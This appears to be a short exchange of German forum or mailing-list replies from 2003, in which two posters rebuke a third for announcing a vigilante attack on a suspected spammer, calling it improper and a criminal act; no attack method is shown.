Ich bitte dich, solche Postings in zukunft zu unterlassen, denn Spam hin, Spam her, Selbstjustiz ist imho nicht in Ordnung (bzw. wenn es für Dich selbst ok ist von mir aus, aber nicht das Forum als Plattform nutzen.).
MfG
Götz--
Losung und Lehrtext für Samstag, 13. September 2003
Ein Mensch sieht, was vor Augen ist; der Herr aber sieht das Herz an. (1.Samuel 16,7)
Richtet nicht nach dem, was vor Augen ist, sondern richtet gerecht. (Johannes 7,24)
(http://www.losungen.de/heute.php3) -
Hi,
ich attackiere nun den offensichtlichen Verursacher mit :
Bist du von allen guten Geistern verlassen?????
Du hast gerade oeffentlich angekuendigt, dass du eine strafbare Handlung machst!Ciao,
Wolfgang
-